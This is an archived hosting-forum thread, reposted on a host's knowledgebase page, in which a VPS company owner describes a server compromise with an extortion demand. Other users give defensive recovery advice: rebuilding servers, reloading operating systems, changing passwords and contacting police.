Knowledgebase

Compromised Server - Attackers have information.

Posted by 3dhomejoe, 08-01-2013, 05:39 AM
Hello WHT, I have recently taken over a (vps) hosting company and the previous owner did not have very high standards on security. I have since gone around and started to improve the security but it has come to my attention that the servers have been compromised and the attackers are demanding money or will release information that they have taken. The information that they have taken/have access to includes but not limited to my solusvm database, the old whmcs database before it was migrated to a different server entirely. They also claim to have root access to all of my systems, the SolusVM master, the slave, and the website VPS's along with information about all of my clients and what they have on the VPS's. What would be the best approach to making sure they are fully out of my systems? I am not going to be paying them any money for their word that they would "leave" all of my systems and delete any data gathered. Any advice will be very helpful. Thanks Joe
Posted by Steven, 08-01-2013, 11:16 AM
Start by setting up a new server for solusvm and securing that, and os reload each node and restore vm backups or setup new servers and migrate them. Do the same for whmcs. Don't host it on a shared server either. In cases like this -- don't listen to people who claim to be able to clean the system.
Posted by whmcsguru, 08-01-2013, 11:54 AM
I'm with Steven on everything, but the last one. Never take a chance on someone that claims they can 'clean the system' . Sure, it might be able to be done (I've done it a few times), but there's always that nagging feeling that you missed something, somewhere. There's always that chance that you're going to miss something. When you setup the new vm's , make sure they're using different passwords (root), of course.
Posted by tnhadmin, 08-01-2013, 12:06 PM
They would have used recent solusvm vulnerability to gain access to your server. I agree with Steven but make sure you examine your data before migration as they might leave something to gain access to your data again. So better you hire security expert to check out your data. Its better idea than paying money to hackers
Posted by Steven, 08-01-2013, 12:06 PM
The reason I said that is there's some cases where a compromised server is not really a server that's compromised but a specific account. In cases like that you don't need to reload the os. I didn't want to portray that any time there is a compromise of any level of magnitude that a os reload must happen.
Posted by HostUS - Alexander, 08-01-2013, 12:19 PM
Contact your local police station, set up a sting. Send money - money gets traced - they get arrested. Which is was as simple ^ seriously though, if they are demanding money, contact your local police. - Alexander
Posted by 3dhomejoe, 08-01-2013, 03:27 PM
Thank you for all of the replies, I really appreciate it. They are demanding the money as bitcoins, so that would be a little harder to track.


Was this answer helpful?

Add to Favourites Add to Favourites

Print this Article Print this Article
Also Read
here is a good host in australia :) (Views: 625)
Looking to switch from skynethosting (Views: 598)
Hostsearch.com Showcase (Views: 587)
ServePath, down all day, power outage (Views: 625)
2checkout down (Views: 650)


Language:

Client Menu

 

Client Login

Email

Password

Remember Me

Search



  
 

Clients

Hosting

VPS Hosting

About Us

Contact Us

Copyright © 2015 DC International LLC in partnership with Bragin IT Solutions Inc. - All Rights Reserved.